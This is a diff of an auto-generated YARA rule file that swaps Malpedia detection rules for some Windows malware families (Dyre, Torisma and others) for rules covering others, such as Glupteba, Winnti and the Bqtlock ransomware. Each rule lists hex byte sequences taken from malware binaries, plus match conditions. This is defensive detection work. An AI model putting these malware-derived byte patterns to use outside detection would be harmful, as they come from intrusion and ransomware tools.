-		logic_hash = "50c9943074c934238ab56a2e724604fcafa0395a42717f2167a9dcfc691be6fb"
+		logic_hash = "f45425f55dbbdbdba945f538455e47f9972b3b43f177d31d74ee7524c51ab351"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115243,47 +115191,32 @@ rule MALPEDIA_Win_Redsalt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 33c9 83f8ff 0f95c1 }
-		$sequence_1 = { 750b 68e8030000 ff15???????? e8???????? }
-		$sequence_2 = { 51 ffd6 85c0 7510 }
-		$sequence_3 = { c745d060ea0000 6a04 8d45d0 50 6806100000 68ffff0000 }
-		$sequence_4 = { e8???????? 85c0 750a 6a32 }
-		$sequence_5 = { 85c0 7515 c705????????01000000 ff15???????? e9???????? }
-		$sequence_6 = { 740d 68???????? e8???????? 83c404 833d????????02 }
-		$sequence_7 = { 83c9ff 85f6 7c0e 83fe7f 7f09 }
-		$sequence_8 = { 6a00 52 c744242401000000 8944242c c744243002000000 }
-		$sequence_9 = { 7509 80780120 7503 83c002 }
-		$sequence_10 = { 83c40c eb02 33c0 8b4df4 }
-		$sequence_11 = { c60100 5f 5e 33c0 }
-		$sequence_12 = { 8d8530fcffff 50 e8???????? 83c40c }
-		$sequence_13 = { e8???????? 83c408 6800010000 68???????? }
-		$sequence_14 = { c6450000 5e 5d 8911 33c0 }
-		$sequence_15 = { f7e7 8bea d1ed 33c0 83ef03 8a06 }
-		$sequence_16 = { c1fa04 c0e302 0ad3 83c004 }
-		$sequence_17 = { 833800 750f c705????????01000000 e9???????? }
-		$sequence_18 = { c644243423 c644243572 c64424367a c644243700 }
-		$sequence_19 = { d2cc bbe3b46b7e 6aa2 dd45ff }
-		$sequence_20 = { de6c58ae c8201cdd f7be5b408d58 1b7f01 d2cc }
-		$sequence_21 = { e8???????? 89ff 152edf0800 488b5c2440 }
-		$sequence_22 = { e8???????? 89fa 4989d8 4889c1 e8???????? }
-		$sequence_23 = { e8???????? 89f8 eb26 f6411840 7406 }
-		$sequence_24 = { e8???????? 8b05???????? 0d80000000 8905???????? }
+		$sequence_0 = { 8985500c0000 8b432c 8b4b24 57 }
+		$sequence_1 = { 57 8db55c030000 e8???????? 53 57 8db59c030000 e8???????? }
+		$sequence_2 = { 8bff 8b4500 83780400 0f84961a0000 8b30 0fb636 8b551c }
+		$sequence_3 = { 894740 8b454c 894744 8b4550 894748 8b4554 89474c }
+		$sequence_4 = { 0f8554020000 57 83ec18 8bc4 89654c 53 50 }
+		$sequence_5 = { 8b149580cf0310 c1e006 8d440224 802080 884dfd 8065fd48 884dff }
+		$sequence_6 = { 894310 5e 5f c20400 6a04 }
+		$sequence_7 = { b8???????? e8???????? 8b7508 8365f000 c706???????? c746581c520310 }
+		$sequence_8 = { ff5004 0fb7c0 6a01 50 ff7528 8d758c ff7524 }
+		$sequence_9 = { 897dc4 50 c745fc02000000 e8???????? 33c0 c745c401000000 c745ec07000000 }
 
 	condition:
-		7 of them and filesize < 2957312
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Torisma_Auto : FILE
+rule MALPEDIA_Win_Glupteba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0490c82-c45a-54e7-aa2a-3188c569a1ea"
+		id = "f0d5e7d7-1d32-5f42-920b-16ebe0ccac58"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.torisma_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glupteba_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "4aa02301b79ecba1924d78ea53a128f60820750cf7fd370e510af85a61be0b19"
+		logic_hash = "833c38370ca2666b80daaec86c0f2af9a38d0d465a2faa6f122cd9317cf83227"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115297,35 +115230,38 @@ rule MALPEDIA_Win_Torisma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 3d83490000 7507 b883490000 }
-		$sequence_1 = { 7402 eb05 e9???????? b833280000 }
-		$sequence_2 = { e8???????? 3d514b0000 7504 33c0 }
-		$sequence_3 = { 8b3f c1ef02 83e701 c1e702 }
-		$sequence_4 = { 488b4c2440 e8???????? 488b442460 488b4018 48c70000000000 }
-		$sequence_5 = { 488b00 488b7820 33c0 b920000000 }
-		$sequence_6 = { 48894c2408 57 4883ec40 48c744242000000000 }
-		$sequence_7 = { ff2495c0d50010 8bc7 ba03000000 83e904 }
-		$sequence_8 = { 837c242000 7504 33c0 eb23 }
-		$sequence_9 = { 894dec 6a00 ff15???????? 8d55dc 52 }
-		$sequence_10 = { 51 8b5510 52 6a25 6a20 }
-		$sequence_11 = { 6a02 8b4da4 8b11 52 }
-		$sequence_12 = { c1e104 8b94242c010000 0bd1 8bca }
+		$sequence_0 = { 81e680800000 895de4 0bfe 8b75fc c1ee07 c1e709 }
+		$sequence_1 = { 742f 68???????? 50 c705????????04000000 ff15???????? 833d????????04 }
+		$sequence_2 = { 83c40c ff750c 66c745f00200 ff15???????? 668945f2 6a10 }
+		$sequence_3 = { ff15???????? 83c444 ff750c ff7508 e8???????? 8bf0 }
+		$sequence_4 = { 68???????? 57 895d0c ff15???????? }
+		$sequence_5 = { 8b4c2404 c1e802 d1e9 0ac1 8ac8 }
+		$sequence_6 = { 03c0 33c8 8bc1 3500630000 c1e808 33c1 }
+		$sequence_7 = { 895f04 894f08 83c710 837d0824 897d0c 7285 8bf9 }
+		$sequence_8 = { 005e3e 46 00ff 3e46 }
+		$sequence_9 = { 00cd 3e46 005e3e 46 }
+		$sequence_10 = { 0107 eb4d 8b02 89442418 }
+		$sequence_11 = { 00ff 3e46 0012 3f }
+		$sequence_12 = { 0101 03d3 8b4620 8bcb }
+		$sequence_13 = { 0106 830702 392e 75a0 }
+		$sequence_14 = { 00f1 3d46005e3e 46 00cd }
+		$sequence_15 = { 0012 3f 46 008bff558bec }
 
 	condition:
-		7 of them and filesize < 322560
+		7 of them and filesize < 1417216
 }
-rule MALPEDIA_Win_Amtsol_Auto : FILE
+rule MALPEDIA_Win_Silentgh0St_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10cd2a6a-97cd-5bbf-a2de-d51937233e16"
+		id = "291abef6-9e33-5a8d-8adc-76e9209f6497"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.amtsol_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silentgh0st"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.silentgh0st_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f41e59806427fb3074e56403dfc0119ba4416aa791cb2055a2846e43c19529c3"
+		logic_hash = "9a04c7809c217e9efeaf55825390ec7954a79ff3371a97034dc7cf6c87eca139"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115339,34 +115275,34 @@ rule MALPEDIA_Win_Amtsol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 83ec20 53 56 8b7508 33db 3bf3 }
-		$sequence_1 = { 035e24 8945fc 8b45f8 8d9c1839d0d4d9 53 e8???????? 8b4df0 }
-		$sequence_2 = { 836d1010 8b7d10 83e810 8bf0 a5 a5 }
-		$sequence_3 = { 50 8d4de4 e8???????? 84c0 7418 8d4de4 e8???????? }
-		$sequence_4 = { c6451054 c6451172 c6451261 c645136e c6451473 c6451566 }
-		$sequence_5 = { 3d01010000 7d0d 8a4c181c 8888b82b4200 40 ebe9 }
-		$sequence_6 = { 53 e8???????? 0345fc 8b4df0 8945f8 8b45f4 }
-		$sequence_7 = { 50 e8???????? 59 50 ff7604 e8???????? 83c41c }
-		$sequence_8 = { 33cb 030e 8d840878a46ad7 50 e8???????? 0345fc }
-		$sequence_9 = { 83c040 50 e8???????? 83c40c 8bc6 5e c3 }
+		$sequence_0 = { c9 c3 8b45fc ff7018 ff750c e8???????? 59 }
+		$sequence_1 = { 33c4 89842488000000 8b8424a0000000 8b8c2494000000 53 8b9c24a0000000 55 }
+		$sequence_2 = { e8???????? 8bcf 85c0 7507 e8???????? ebb0 6834020000 }
+		$sequence_3 = { 33c9 83e701 894c2418 897c2414 a900000004 0f8596000000 c744241801030000 }
+		$sequence_4 = { 8bc6 c1f805 8bfe 53 8d1c8500c40e10 8b03 83e71f }
+		$sequence_5 = { 8d04454c950e10 8bc8 2bce 6a03 d1f9 68???????? 2bd9 }
+		$sequence_6 = { 83c420 e9???????? 8b96bc000000 8b8290000000 3bc5 7514 6a0a }
+		$sequence_7 = { 8d85f8feffff 6a5c 50 e8???????? 59 59 3bc3 }
+		$sequence_8 = { 8b4a10 03c0 80e108 03c0 0fb6d1 83c404 03c0 }
+		$sequence_9 = { 8d8304010000 8bd6 2bd0 b910000000 89542420 eb04 8b542420 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 2065408
 }
-rule MALPEDIA_Win_Dyre_Auto : FILE
+rule MALPEDIA_Win_Unidentified_100_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71a1cda5-bbc1-5437-8a4b-d424fa7e7598"
+		id = "46aeb4db-19b2-5469-a0eb-5c4c4a4bf0ff"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dyre_auto.yar#L1-L228"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_100_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "af535d590e4b9fb30bcfd8419a9c576a8fa6a184366164dc5fc0ce71c5e82236"
+		logic_hash = "47aac890cf0ac352426261b33fabc1042e2b5071c52a28784cdba5465d5e39a5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115378,32 +115314,19 @@ rule MALPEDIA_Win_Dyre_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800004000 6800000400 ff15???????? a3???????? 85c0 }
-		$sequence_1 = { 747c 8d4602 50 e8???????? 8bf8 }
-		$sequence_2 = { 33c8 894304 895308 894b10 c745ec10000000 837df400 0f84f7000000 }
-		$sequence_3 = { 59 85c0 740d 8d4801 3b4d14 }
-		$sequence_4 = { 742e 53 8bc7 e8???????? 8bd8 }
-		$sequence_5 = { 81ec14010000 8364240400 53 56 57 }
-		$sequence_6 = { 59 83f8ff 7549 33ff 83f8ff 7542 }
-		$sequence_7 = { 33d2 f7f3 3bd6 7409 }
-		$sequence_8 = { 4883ec20 488bd9 b910270000 ff15???????? 488bcb }
-		$sequence_9 = { 488bcd ff15???????? 488b5c2460 8bc7 4883c440 }
-		$sequence_10 = { 4883ec20 488b0d???????? 33d2 ff15???????? }
-		$sequence_11 = { 488b4c2458 488d442450 8d5301 4533c9 4533c0 4889442420 895c2450 }
-		$sequence_12 = { 488bd9 83fa04 763b 0f1f00 0fb74b02 ff15???????? }
-		$sequence_13 = { 4883ec20 448b4124 33ff 488bf2 428d04c500000000 488bd9 014120 }
-		$sequence_14 = { 488bcb ff15???????? ffc7 034310 8d740627 413bfc 7cdf }
-		$sequence_15 = { 488bcd 897c2470 48897c2420 ff15???????? 85c0 }
-		$sequence_16 = { 668b1401 668910 83c002 4e 75f3 }
-		$sequence_17 = { 85db 7416 57 8bfa 2bfe 90 }
-		$sequence_18 = { 8bd8 56 8bf1 85db 7416 }
-		$sequence_19 = { 50 a1???????? 6a08 50 ff15???????? 8bd8 }
-		$sequence_20 = { ff15???????? 8bf0 8d85d4fdffff 50 }
-		$sequence_21 = { 90 ff15???????? 8a0437 8806 46 4b }
-		$sequence_22 = { 833d????????00 751b 6a00 6800004000 6800000400 }
+		$sequence_0 = { 0fb6442420 2580000000 88442402 0fb6442420 }
+		$sequence_1 = { 488b542420 88040a 6b05????????03 0fb60c24 03c1 4898 488b4c2420 }
+		$sequence_2 = { 8d0c8d03000000 4863c9 488b542448 4c8b442440 410fb60400 88040a }
+		$sequence_3 = { 488d9424a0070000 488d8c24a0050000 e8???????? 8b442434 ffc0 eb3d }
+		$sequence_4 = { 3da5000000 751b 48630424 488b4c2478 c6040146 48630424 }
+		$sequence_5 = { 488b8c24c0000000 4c8b442468 420fb60c01 e8???????? 0fb6c0 8b4c242c 33c8 }
+		$sequence_6 = { 488bf1 b932000000 f3a4 488d842402030000 }
+		$sequence_7 = { 488b8c24c0000000 4c8b842480000000 420fb60c01 e8???????? 0fb6c0 8b4c2438 33c8 }
+		$sequence_8 = { 742d 4c8d4c2460 41b802000000 488d542464 488b4c2448 ff15???????? 8b442460 }
+		$sequence_9 = { c744841001000000 e9???????? 48630424 488b4c2470 0fb60401 83f82b 751e }
 
 	condition:
-		7 of them and filesize < 590848
+		7 of them and filesize < 372736
 }
 rule MALPEDIA_Win_Zloader_Auto : FILE
 {
@@ -115482,18 +115405,18 @@ rule MALPEDIA_Win_Zloader_Auto : FILE
 	condition:
 		7 of them and filesize < 5360640
 }
-rule MALPEDIA_Win_Miancha_Auto : FILE
+rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fc1eda3c-bd5f-5571-91d7-7aefaea33797"
+		id = "cd974481-8117-5632-aade-5ef10c39e2d5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miancha_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orpcbackdoor_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f932de22bd95ab60efbbe4e694e46f3915e7f38800c91edc1e731744ddf1fb94"
+		logic_hash = "dd9da45feb732da3d95212bca52a2ed758b546277cb96d095b747d85f59e36f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115507,32 +115430,32 @@ rule MALPEDIA_Win_Miancha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744242000000000 ff15???????? 50 ff15???????? 8bf0 85f6 }
-		$sequence_1 = { 56 8b35???????? 6a02 6a00 68???????? }
-		$sequence_2 = { ffd6 85c0 741a 837c241800 7413 }
-		$sequence_3 = { 68???????? c744242000000000 ff15???????? 50 ff15???????? 8bf0 85f6 }
-		$sequence_4 = { 8b0d???????? 895008 8a15???????? 89480c }
-		$sequence_5 = { 52 6803000080 ff15???????? 85c0 741f }
-		$sequence_6 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? 89480c }
-		$sequence_7 = { 85c0 741a 837c241800 7413 }
-		$sequence_8 = { ff15???????? 8bf0 85f6 7412 8d542418 }
-		$sequence_9 = { 40 50 56 8b35???????? 6a02 6a00 }
+		$sequence_0 = { 8d45a4 50 e8???????? 59 6a0b 59 8bf0 }
+		$sequence_1 = { 8b4df0 e8???????? 8945d8 33c0 8b4de4 83c101 }
+		$sequence_2 = { e8???????? 8d8d18ebfeff e8???????? 8d8d48f4feff e8???????? 8d8d30f4feff e8???????? }
+		$sequence_3 = { 50 8d8de8ecffff e8???????? ff30 8d8d10e9ffff e8???????? }
+		$sequence_4 = { 50 e8???????? 59 8845d4 8d45d0 50 8d45f8 }
+		$sequence_5 = { 8b85ccfdffff 8b00 ffb5ccfdffff ff5024 89859cfdffff 8d8d50fdffff e8???????? }
+		$sequence_6 = { 750a 68???????? e8???????? 8b45f0 833822 750a 68???????? }
+		$sequence_7 = { 817df8ff0f0000 7649 8b45f0 ff704c 68ff0f0000 6a01 ff7508 }
+		$sequence_8 = { a1???????? 33c5 8945fc 894df0 8365e800 8b45f0 8b00 }
+		$sequence_9 = { eb9e 8d8508f8feff 50 8d8da0fbfeff e8???????? 6a01 8d8da8fcfeff }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 918528
 }
-rule MALPEDIA_Win_Graphdrop_Auto : FILE
+rule MALPEDIA_Win_Winnti_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "237c51dc-e941-5d7c-b6d3-2562536d7e1c"
+		id = "1351f8e3-6ca5-5a13-9678-9210d9ddffd2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphdrop_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winnti_auto.yar#L1-L242"
 		license_url = "N/A"
-		logic_hash = "0e6707eb4bbec74f1d6caa5a7e229009514fcba8c763f4b645f99a1b6c93d629"
+		logic_hash = "09cc054785791e781076cf9631fef38d07059412817f6de2934895bd3887e46e"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -115546,32 +115469,46 @@ rule MALPEDIA_Win_Graphdrop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4155 0f77 53 90 }
-		$sequence_1 = { 4155 49c7c501000000 4150 4152 415a 4158 }
-		$sequence_2 = { 0f77 4157 90 415f }
-		$sequence_3 = { 0f77 0f77 415d 90 }
-		$sequence_4 = { 50 58 5a 49ffc9 }
-		$sequence_5 = { 0f77 0f77 5b 0f77 }
-		$sequence_6 = { 90 0f77 415c e9???????? }
-		$sequence_7 = { 49c7c501000000 4150 4152 415a }
-		$sequence_8 = { 4150 4152 415a 4158 }
-		$sequence_9 = { 0f77 4155 0f77 4150 }
+		$sequence_0 = { 50 56 ff15???????? 85c0 7e79 8d4c2418 8d942484000000 }
+		$sequence_1 = { 8dbc24c4000000 8d942410010000 f3ab 668b8424740b0000 bf???????? 66898424d2050000 83c9ff }
+		$sequence_2 = { 8b734c 03f8 8bc1 c1e902 f3a5 8bc8 }
+		$sequence_3 = { f3ab 8b8c2498010000 c644242004 51 c644242501 ff15???????? }
+		$sequence_4 = { ffd7 68???????? 68???????? 89460c }
+		$sequence_5 = { 85c0 751a 8bcb 8d142e 2bce 51 }
+		$sequence_6 = { e8???????? 8b4c2418 50 6800040000 }
+		$sequence_7 = { 8bfa 83c9ff f2ae 8b54242c }
+		$sequence_8 = { 0f849a000000 4c8d5b2e 660f1f440000 410fb70b 458bca }
+		$sequence_9 = { 8b4b1c 4803cf 8b0491 4803c7 488b5c2410 }
+		$sequence_10 = { 4585d2 759d 488b7db7 458bd9 44894d97 }
+		$sequence_11 = { 4053 4883ec40 48c74424580a000000 488b442458 4c8d442458 }
+		$sequence_12 = { 4863c9 e8???????? 488bd8 4c8d443710 4983781810 7203 4d8b00 }
+		$sequence_13 = { 75f1 408830 488d542450 4038742450 }
+		$sequence_14 = { 90 488bd0 488d4b28 e8???????? 90 48837dd710 7209 }
+		$sequence_15 = { 4863d9 4c8be3 49c1fc05 4c8d355a4f0a00 83e31f 486bdb58 }
+		$sequence_16 = { 48c784248800000000000000 488d942488000000 488d4c2428 e8???????? 488d05e7700100 4889442428 488d1553d80100 }
+		$sequence_17 = { 7517 488d0513ac0a00 488b4c2430 483bc8 7406 e8???????? 90 }
+		$sequence_18 = { 7511 33c0 4881c4e0000000 415f 415e }
+		$sequence_19 = { 4889742430 488b442440 48894310 48894b18 48897c2448 }
+		$sequence_20 = { 741e 837d6001 7511 488d5568 ff15???????? 488b8d00010000 ff15???????? }
+		$sequence_21 = { 48897c2478 488b8c2400010000 4885c9 741f 4183fe01 7513 }
+		$sequence_22 = { 8bd8 85c0 7848 488b8c24b0000000 }
+		$sequence_23 = { 488d0527eb0a00 eb04 4883c010 4883c428 c3 4883ec28 e8???????? }
 
 	condition:
-		7 of them and filesize < 4186112
+		7 of them and filesize < 1581056
 }
-rule MALPEDIA_Win_Reedbed_Auto : FILE
+rule MALPEDIA_Win_Unidentified_037_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74769a46-8253-5d47-b255-0c21b0e137a7"
+		id = "96c11217-51d7-5f4b-bf36-23d830fdb069"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reedbed"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.reedbed_auto.yar#L1-L143"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_037_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "9739a2569b16e57b90481814e6cc540a2c3a0da3aecf12af2fc73ab886c25305"
+		logic_hash = "8c50fe3091c6eb5a168263d841c7329778565aaf5d56b9bbcef638ccc0102861"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115585,36 +115522,32 @@ rule MALPEDIA_Win_Reedbed_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 e8???????? 488b0d???????? 488981c2140000 }
-		$sequence_1 = { 33c9 ff15???????? 85c0 751e }
-		$sequence_2 = { 4885c9 7405 e8???????? 33c0 0f57c0 }
-		$sequence_3 = { eb19 488d15e3d10100 eb10 488d15cad10100 eb07 488d15b5d10100 4533c0 }
-		$sequence_4 = { 4c8d0d44e50000 b919000000 4c8d0534e50000 488d1531e50000 e8???????? }
-		$sequence_5 = { 488bd8 4885c0 7431 488bc8 ff15???????? 83f8ff }
-		$sequence_6 = { 8364244000 4c8d4c2440 baffff0000 c744242004000000 41b801000000 }
-		$sequence_7 = { 488b83a6140000 4c8974080e 4883c13f 483bcf 7ceb e8???????? 33c9 }
-		$sequence_8 = { c7450400000000 c7452400000000 488b8548010000 83780a00 }
-		$sequence_9 = { c7450400000000 c7452400000000 488b85a0010000 4883b8a614000000 }
-		$sequence_10 = { c7450400000000 83bd0801000000 7515 488d15ce130f00 }
-		$sequence_11 = { c7450400000000 ba01000000 b900003f00 e8???????? }
-		$sequence_12 = { c7450400000000 c7452400000000 488b8540010000 8b808c140000 }
-		$sequence_13 = { c7450400000000 837d0400 7534 488b8580010000 }
+		$sequence_0 = { fec8 8801 eb09 51 e8???????? 83c404 899ef4000000 }
+		$sequence_1 = { eb63 a802 7462 68???????? eb58 663d0900 7524 }
+		$sequence_2 = { b9ff010000 33c0 8dbc242e080000 f3ab 66ab 8d44242c 50 }
+		$sequence_3 = { 8b35???????? 3bf5 0f8439010000 8b0d???????? b8c12787cb 2bce f7e9 }
+		$sequence_4 = { e8???????? 68???????? 68???????? 6802000080 e8???????? e8???????? a1???????? }
+		$sequence_5 = { 51 52 e8???????? 8d85cce0ffff 56 50 }
+		$sequence_6 = { 885e40 895c2418 884e44 895e48 895e4c 895e50 }
+		$sequence_7 = { 897dcc 3bfe c645fc04 742f 68???????? 897704 c7470801000000 }
+		$sequence_8 = { 51 ff15???????? 8d94241c020000 6a00 }
+		$sequence_9 = { ff15???????? 56 bf01000000 ff15???????? 56 ff15???????? 8bc7 }
 
 	condition:
-		7 of them and filesize < 3760128
+		7 of them and filesize < 167936
 }
-rule MALPEDIA_Win_Rarog_Auto : FILE
+rule MALPEDIA_Win_Bqtlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5f8ab57-da39-59fd-96e2-5478facae854"
+		id = "bb5e42ac-0a96-533f-bdf8-f7363192cc82"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rarog_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bqtlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bqtlock_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "631ab74dfbbcce858a4c6605f35ed1c081c9a6b77767d5321714353e8fbb62e4"
+		logic_hash = "fe09c813bf2717fae94718806fa0772093be79bdfe9076451ef94ec757b5ff93"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115628,32 +115561,32 @@ rule MALPEDIA_Win_Rarog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8c246c030000 33cc e8???????? 8be5 5d c3 55 }
-		$sequence_1 = { 8d45b8 50 8d4d24 e8???????? 83781408 7202 8b00 }
-		$sequence_2 = { 89a504ffffff c741140f000000 895910 68???????? 8819 e8???????? e8???????? }
-		$sequence_3 = { 8bc8 8bdf c645fc01 e8???????? c645fc02 c70424???????? 50 }
-		$sequence_4 = { c645fc22 e8???????? 8bd8 8db5bcfbffff c645fc23 e8???????? 8bf8 }
-		$sequence_5 = { ffb510ffffff 8d8d48ffffff e8???????? 8d9d48ffffff e8???????? 8b8510ffffff }
-		$sequence_6 = { 8bc4 89a550ffffff 50 e8???????? 8b8d5cffffff c645fc17 }
-		$sequence_7 = { 884597 c645fc04 e8???????? 83ec1c }
-		$sequence_8 = { ff7518 8845bc ff7514 8d45b0 ff75bc ff75d0 50 }
-		$sequence_9 = { 83c40c 8d8dbcfbffff 51 8bc8 }
+		$sequence_0 = { 0f859b000000 8b08 e8???????? 6690 4c89e1 e8???????? 48c745e800000000 }
+		$sequence_1 = { 498d5508 4c89c1 4829d1 83e108 742f 498b5508 4839d0 }
+		$sequence_2 = { 488d540002 e8???????? 488b4ba0 4885c9 7405 e8???????? 488b4500 }
+		$sequence_3 = { 4d85c0 48895110 4889cb 0f95c0 31d2 894108 488d057fde0a00 }
+		$sequence_4 = { 4c89d9 ff5048 83f8ff 0f8451020000 4c8b5c2468 89c1 0fb6d0 }
+		$sequence_5 = { 4c8d742450 4531d2 4c894c2438 4c89e9 4c89742440 48c744244800000000 664489542450 }
+		$sequence_6 = { 488d4110 488901 4885d2 7505 4d85c0 7510 4531c9 }
+		$sequence_7 = { 4c8d0daa38fcff 488b4038 4c39c8 0f856d030000 4839f2 740b 4889f2 }
+		$sequence_8 = { b800000000 ba00000000 480f45542460 410f44c6 4889542460 4038f0 0f84fdfaffff }
+		$sequence_9 = { 4d85c0 0f8469fdffff e9???????? e8???????? 4889c3 ff542438 8b00 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 4444160
 }
-rule MALPEDIA_Win_Ksl0T_Auto : FILE
+rule MALPEDIA_Win_Meow_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "38d6ccea-2477-53a3-80c5-72d7cca1e17c"
+		id = "8ae50208-eda0-5ebd-a6a9-2e33c00b8273"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ksl0t_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meow_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "d56faacde84036ddaab537f194f3df4539ee4dbdadae9af8318bac8df1d8305a"
+		logic_hash = "bb1378303eade72e8b389282cb73ba0dc64a8fed8abbcfd4aff9fb59d7155dea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115667,38 +115600,32 @@ rule MALPEDIA_Win_Ksl0T_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 44895c2440 897c2438 89542430 894c2428 89442420 488d15a8cb0000 }
